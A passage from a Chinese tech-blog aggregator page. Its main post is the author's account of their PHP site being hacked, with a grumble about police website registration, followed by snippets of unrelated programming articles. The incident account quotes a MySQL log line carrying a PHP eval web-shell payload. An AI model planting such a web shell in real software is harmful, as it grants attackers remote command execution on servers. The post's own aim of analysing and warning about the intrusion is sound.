当前位置：首页 > news >正文

一些计算机零碎知识随写（25年1月）-1

news 2025/11/7 1:57:31

我原以为世界上有技术的那批人不会那么闲，我错了，被脚本真实了。

今天正隔着画画呢，手机突然弹出几条安全告警通知。

急忙打开服务器，发现问题不简单，直接关服务器重装系统.....

首先，不要认为小网站，没什么人看就不做防护

互联网不缺乏脚本小子和没啥事喜欢攻击的黑客（在这个时代也不是没有可能是恶意的流窜ai），不要向我一样，认为这个网站没什么人看，什么保护也不加，等到被爆破了才急忙修改，要是生产环境被这么搞一下那就很坏了。（各种意义上的）

因为我是php写的网站，php的漏洞很多是历史遗留问题了，没有很好的代码规范的话那很容易被入侵。

就比如我没有加入文件验证之类的（我当时的想法：不会有人这么闲吧）。

我的思考

php这个语言漏洞太多，对于我来说要么以后补课网络安全php这方面的课程，要么趁早换一门语言。

那名坏笔到底在我服务器干了什么呢？

事情已经发生了，气急败坏不如冷静分析。

首先是恶意上传一个php文件，然后查询了我所有的数据库文件

具体的代码如下

C:\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument60 Query	select'<?php eval($_POST[admin]);?>'60 Quit

那很坏了

eval 函数在这种情况下如果被成功执行，明显是具有恶意企图的，可能会导致服务器被攻击者远程控制、执行任意命令等安全风险。

第二个是一个木马病毒

太坏了

根据计算机病毒百科来看这玩意是近几年的开发的病毒。

可能会修改系统的关键文件，造成系统崩溃或无法正常启动。

它可以监控用户的计算机操作，并窃取敏感信息，如银行账户密码、个人隐私等。

所以说病毒什么乱七八糟并不是少了，而是坏笔们不直接打普通电脑了。

最终它干了什么

看样子是想把我服务器当作代理（？不确定。从它后面安装的内网穿透工具和代理工具来看是这样的。

然后正上厕所呢，公安给我打电话来了。

公安备案失败

之前icp备案根据腾讯云的提示操作起来没有过于麻烦，就是写写表（个人是这样，企业的话多一些步骤。）

然后icp过完审核居然还要公安部审核，就不能一起审核吗，真是徒增开发者的麻烦呢。

个人的网站icp备案和公安的表几乎没有什么差别，所以真的很难理解呢！

然后就打电话告诉我说不受理，去自己的户籍地办理去（icp是常驻地）

emm...???

感叹一些地方上的办事效率差，效率低了。

所以你以为我要告诉你个人开发者地址填写的时候要写户籍地icp写常驻地吗？

不啊我的朋友，个人博客要就不申请域名要不就一步到位买国外的好啦！就不用这么多麻烦的手续啦！

一些计算机零碎知识随写（25年1月）-1

我原以为世界上有技术的那批人不会那么闲，我错了，被脚本真实了。今天正隔着画画呢，手机突然弹出几条安全告警通知。急忙打开服务器，发现问题不简单，直接关服务器重装系统..... 首先，不要认为小网站&…...

编程日记 2025/1/13 6:46:28

Qt学习笔记第81到90讲

第81讲串口调试助手实现自动发送为这个名叫“定时发送”的QCheckBox编写槽函数。想要做出定时发送的效果，必须引入QT框架下的毫秒级定时器QTimer，查阅手册了解详情。在widget.h内添加新的私有成员变量： QTimer *timer; 在widget类的构造…...

编程日记 2025/1/13 6:44:26

Centos9 + Docker 安装 MySQL8.4.0 + 定时备份数据库到本地

Centos9 Docker 安装 MySQL8.4.0 定时备份数据库到本地创建目录，创建配置文件启动容器命令定时备份MySQL执行脚本Linux每日定时任务命令文件内参数其他时间参数 AT一次性定时任务创建目录，创建配置文件 $ mkdir -p /opt/mysql/conf$ vim /opt/mysql/…...

编程日记 2025/1/13 6:43:23

网络原理一＞UDP协议详解

UDP和TCP都是应用层中的重要协议，如果做基础架构开发，会用得多一些。这一篇我们先简单聊一下的UDP TCP格式呈现： 我们知道UDP是一种无连接，面向数据报，全双工，不可靠传输特性的网络协议。基本格式如图…...

编程日记 2025/1/13 6:41:21

MySQL的小问题

编码问题不管官方使用什么编码：latin1、gbk、utf8、utfmb4。统一使用utfmb4 MySQL中的utf8并不是utf-8，它省略了一个字节，只是用三个字节存储所有的符号，utfmb4才是utf-8 远程登录问题： MySQL官方默认没有启动远程…...

编程日记 2025/1/13 6:40:20

Mac——Docker desktop安装与使用教程

摘要本文是一篇关于Mac系统下Docker Desktop安装与使用教程的博文。首先介绍连接WiFi网络，然后详细阐述了如何在Mac上安装Docker，包括下载地址以及不同芯片版本的选择。接着讲解了如何下载基础镜像和指定版本镜像，旨在帮助用户在Mac上高效使…...

编程日记 2025/1/13 6:39:19

FastApi Swagger 序列化问题

问题错误现象： fastapi的 swagger 界面无法正常打开控制台报错：raise PydanticInvalidForJsonSchema(fCannot generate a JsonSchema for {error_info}) 详细报错： File "d:\Envs\miniconda3\envs\xdagent\lib\site-packages\pydan…...

编程日记 2025/1/13 6:38:18

《机器学习》——sklearn库中CountVectorizer方法（词频矩阵）

CountVectorizer方法介绍 CountVectorizer 是 scikit-learn 库中的一个工具，它主要用于将文本数据转换为词频矩阵，而不是传统意义上的词向量转换，但可以作为词向量转换的一种基础形式。用于将文本数据转换为词频矩阵，它是文本特征…...

编程日记 2025/1/13 6:37:17

UML系列之Rational Rose笔记三：活动图（泳道图）

一、新建活动图（泳道图） 依旧在用例视图里面，新建一个activity diagram；新建好之后，就可以绘制活动图了： 正常每个活动需要一个开始，点击黑点，然后在图中某个位置安放，接…...

编程日记 2025/1/13 6:36:16

Java面向对象面经总结

目录面向对象基础面向对象与面向过程的区别创建一个对象用什么运算符，对象实体与对象引用的区别对象相等和引用相等的区别构造方法的特点，是否可被重写？ 面向对象三大特征封装继承多态接口和抽象类的共同点和区别深拷贝…...

编程日记 2025/1/13 6:35:15

红队工具使用全解析：揭开网络安全神秘面纱一角

红队工具使用全解析：揭开网络安全神秘面纱一角 B站红队公益课：https://space.bilibili.com/350329294 学习网盘资源链接：https://pan.quark.cn/s/4079487939e8 嘿，各位网络安全爱好者们！在风云变幻的网络安全战场上&am…...

编程日记 2025/1/13 6:34:14

OpenLinkSaas 2025年第一季度开发计划

OpenLinkSaas在2025的发展方向是强化基础设施和研发协作，弱化管理相关的功能。为了根据参与到软件研发的整个流程，OpenLinkSaas会增加一系列的基础设施项目，并和OpenLinksaas进行深度整合。目前计划中的基础设施: 链路追踪系统(OpenDragonF…...

编程日记 2025/1/13 6:32:12

【python小工具】怎么获取视频的关键帧频率？

使用 FFmpeg 提取 MP4 视频的关键帧并计算关键帧频率可以按以下步骤进行： 提取关键帧： 使用 FFmpeg 提取视频中的关键帧可以通过以下命令实现： ffmpeg -i input.mp4 -vf "selecteq(pict_type,I)" -vsync vfr keyframes_%03d.jpg…...

编程日记 2025/1/13 6:31:11

数字孪生可视化在各个行业的应用场景

数字孪生技术，作为新一代信息技术的集大成者，正在深刻改变着我们对物理世界的认知和管理方式。本文将探讨数字孪生可视化在不同行业的应用场景，以及它们如何赋能行业数字化转型。 1. 智慧城市与交通在智慧城市领域，数字孪生技术…...

编程日记 2025/1/13 6:29:09

python <shut.py> import ntplib from datetime import datetime, timezoneimport time import osimport easygui# net time def get_network_time():time.sleep(3)"""从网络时间服务器获取时间"""client ntplib.NTPClient()response c…...

编程日记 2025/1/13 6:27:07

Go可以使用设计模式，但绝不是《设计模式》中的那样

文章精选推荐 1 JetBrains Ai assistant 编程工具让你的工作效率翻倍 2 Extra Icons：JetBrains IDE的图标增强神器 3 IDEA插件推荐-SequenceDiagram，自动生成时序图 4 BashSupport Pro 这个ides插件主要是用来干嘛的 ？ 5 IDEA必装的插件&…...

编程日记 2025/1/13 6:25:04

【C语言】_使用冒泡排序模拟实现qsort函数

目录 1. 排序函数的参数 2. 排序函数函数体 2.1 比较元素的表示 2.2 交换函数Swap的实现 2.3 排序函数bubble_sort的实现 3. 测试整型数据排序 3.1 整型数据比较函数cmp_int的实现 3.2 整型数据排序后输出函数print_int的实现 3.3 整型数据测试函数test_int的实现 3…...

编程日记 2025/1/13 6:24:03

openCvSharp 计算机视觉图片找茬

一、安装包 <PackageReference Include"OpenCvSharp4" Version"4.10.0.20241108" /> <PackageReference Include"OpenCvSharp4.runtime.win" Version"4.10.0.20241108" /> 二、准备两张图片三、编写代码 using OpenCv…...

编程日记 2025/1/13 6:22:01

从零开始开发纯血鸿蒙应用之处理外部文件

从零开始开发纯血鸿蒙应用一、外部文件二、外部文件的访问形式1、主动访问2、被动访问三、代码实现1、DocumentViewPicker2、Ability Skills3、onNewWant 函数4、冷启动时处理外部文件一、外部文件对于移动端app来说，什么是外部文件呢？是那些存储在…...

编程日记 2025/1/13 6:21:00

Spring中三级缓存详细讲解

1、Spring三级缓存是什么，过程是怎么样的？ Spring 中的三级缓存主要用于单例 Bean 的生命周期管理，特别是在循环依赖时，它通过不同阶段暴露 Bean 实例来确保依赖注入的顺利完成。缓存的内容如下： 一级缓存 (singleton…...

编程日记 2025/1/13 6:18:58

docker详细操作--未完待续

docker介绍 docker官网: Docker：加速容器应用程序开发 harbor官网：Harbor - Harbor 中文使用docker加速器: Docker镜像极速下载服务 - 毫秒镜像是什么 Docker 是一种开源的容器化平台，用于将应用程序及其依赖项（如库、运行时环…...

编程新知 2025/10/29 19:16:36

C++：std::is_convertible

C++标志库中提供is_convertible，可以测试一种类型是否可以转换为另一只类型： template <class From, class To> struct is_convertible; 使用举例： #include <iostream> #include <string>using namespace std;struct A { }; struct B : A { };int main…...

编程新知 2025/6/11 15:23:57

MFC内存泄露

1、泄露代码示例 void X::SetApplicationBtn() {CMFCRibbonApplicationButton* pBtn GetApplicationButton();// 获取 Ribbon Bar 指针// 创建自定义按钮CCustomRibbonAppButton* pCustomButton new CCustomRibbonAppButton();pCustomButton->SetImage(IDB_BITMAP_Jdp26)…...

编程新知 2025/10/31 16:39:39

多场景 OkHttpClient 管理器 - Android 网络通信解决方案

下面是一个完整的 Android 实现，展示如何创建和管理多个 OkHttpClient 实例，分别用于长连接、普通 HTTP 请求和文件下载场景。 <?xml version"1.0" encoding"utf-8"?> <LinearLayout xmlns:android"http://schemas…...

编程新知 2025/9/30 14:27:04